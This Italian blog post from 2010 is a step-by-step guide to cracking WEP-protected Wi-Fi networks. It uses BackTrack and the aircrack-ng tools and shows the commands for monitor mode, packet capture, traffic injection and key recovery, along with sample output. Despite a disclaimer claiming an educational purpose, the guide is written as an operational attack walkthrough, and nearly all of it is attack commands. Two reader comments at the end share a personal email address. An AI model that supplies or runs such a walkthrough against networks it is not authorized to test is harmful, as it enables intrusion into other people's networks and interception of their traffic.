sabato 11 settembre 2010

SICUREZZA:crackare una rete wifi(WEP)

Ecco una piccola guida su come crackare reti wireless con cifratura WEP.
Non mi resta che augurarvi buona lettura =).

ATTENZIONE!L'AUTORE DELLA GUIDA(GHEBBO_HCK) NON SI ASSUNE NESSUNA RESPONSABILITA' DELL'USO INAPPROPRIATO DELLE INFORMAZIONI QUI CONTENUTE.
LA GUIDA HA UNO SCOPO ESCUSIVAMENTE INFORMATIVO/DIDATTICO.

In questo articolo illustrerò come crackare reti wireless protette da una cifratura "WEP".

Il primo passo consiste nel precurarsi "BackTrack4" (o anche "BackTrack3").
Ora,dopo aver scaricato la .ISO,masterizzate il tutto e attendete(ma va??)il completamento della masterizzazione.(scarica BackTrack!)
Fatto questo riavviate il computer e inserite il disco nel lettore CD/DVD per far partire il "LiveCD*".
Se il "LiveCD" non parte cambiate l'ordine delle peroferiche e mettete per primo il lettore CD/DVD,poi il "LiveCD"
dovrebbe partire...
Partito il LiveCD selezionate l'opzione più adatta alle vostre esigenze e,appena permesso, digitate "startx**" per
far partire l'interfaccia grafica di BackTrack.
Se necessario e se richiesto inserite i seguenti dati di LOGIN:

USERNAME:root
PASSWORD:toor


*LiveCD:Un CD/DVD che contiente un SO*** eseguibile,senza aver bisogno di alcuna installazione.
**StartX:Comando per far partire l'interfaccia grafica.
***SO:Sistema Operativo


Ora clickate sull'icona della konsole o premete ALT+F2 e digitate "konsole".
Per poter effettuare con successo il "crack" della rete abbiamo bisogno di far partire la "monitor mode*" quindi digitate:

airmon-ng

E vi dovrebbero comparire tutte le periferiche disponibili.
Ora digitate :

airmon-ng start <nome interfaccia>

Ovviamente al posto di <nome interfaccia> dovete mettere il nome della vostra interfaccia.
Ma cosa abbiamo fatto?


airmon-ng è l'applicazione che gestisce le interfaccie.
start è il comando.
interfaccia credo si capisca.


*Monitor Mode:E' la modalità della scheda che (in poche e rozze parole) serve ad abilitare l'injection.

Ecco finalmente un po di "azione" =).
Digitate il comando:

airodump-ng <nome interfaccia>

e dovrebbe uscire una cosa del genere:


CH 7 ][BAT 3 hour 30 mins ][Elapsed: 0 s][2010-09-11 21:44

BSSID            PWR  Beacons   #Data   #/s   CH   MB ENC CHIHPER  AUTH  ESSID

ab:cd:ef:gh:il:mn  -30       1                  0      0   11   54   WEP     WEP        OPN  CrackMe

Ora aspettate di vedere la vostra connessione e premete CTRL+C(carattere di escape).
Copiato il BSSID della rete che vogliamo attaccare digitiamo:

airodump-ng -w <filename> -c <channel> --bssid <incolliamo il BSSID> <nome interfaccia>

Prima di continuare vi spiegherò (ancora una volta) cosa abbiamo fatto:

airodump-ng è l'applicazione per "cercare" le reti e "catturare" i pacchetti.
<nome interfaccia> è l'interfaccia da dove "cercare" e "catturare".

Poi:

airodump-ng come prima.
-w <filename> è l'opzione di airodump che serve a salvare i pacchetti catturati sul file indicato(<filename>).
-c <channel> è l'opzione di airodump che serve ad indicare su qualce canale "cercare/catturare".
--bssid <bssid> serve ad indicare da quale connessione "catturare" i pacchetti.
<nome interfaccia> come prima.


Ecco fatto!Ora stiamo catturando i pacchetti...
Ma non è finità qui...
Ora "velocizziamo" le cose:generiamo traffico e velocizziamo la ricezione dei pacchetti =).
Per questo nobile (si fa per dire =P ) scopo c'è aireplay-ng.

Quindi aprite una nuova Konsole e digitate:



aireplay-ng -9 <nome interfaccia>


Questo comando serve a testare che la scheda sia adatta all'injection.


aireplay-ng -1 0 -a <bssid> <nome interfaccia>


Dove:


aireplay-ng è l'applicazione.
-1 0 indica che bisogna effettuare una deautenticazione.
-a <bssid> è il bersaglio.
<nome intefaccia> è l'interfaccia da usare.


Dovrebbe uscire una schermata che dice:

Read <numero di pacchetti>(got <numero> ARP request,<numero> ACKs)

Ora non ci resta che aspettare che:

CH 7 ][BAT 3 hour 30 mins ][Elapsed: 0 s][2010-09-11 21:44

BSSID            PWR  Beacons   #Data   #/s   CH   MB ENC CHIHPER  AUTH  ESSID

ab:cd:ef:gh:il:mn  -30       1                  0      0   11   54   WEP     WEP        OPN  CrackMe


la parte #Data arrivi a (circa) 30000 a che le ARP request e gli ACKs inizino ad aumentare in modo esponenziale
e...CRACK!!!

Digitate:


aircrack-ng <filename>*.cap

Dove:

aircrack è l'applicazione per crackare.
<filename>*.cap è il file dove,precedentemente (con airodump), abbiamo salvato 
                            i pacchetti.

Ora solo un po di pazienza e il programma dovrebbe visualizzare:

KEY FOUND![12:34:56:78]   ASCII:prova

In caso non visualizzi la parte "ASCII:prova" la password è quella tra le parentesi quadre,ovviamente, senza i ':'.

Spero che la guida sia stata soddisfacente =)!
E,mi raccomando,se ho sbagliato qualche cosa vi prego di segnalarmelo,provvederò subito!

2 commenti:

  1. Gabri sono andrea l amico di emanuele potresti lasciarmi la tua e mail?

    RispondiElimina
  2. Puoi contattarmi all indirizzo: lamonacaandrea@virgilio.it

    RispondiElimina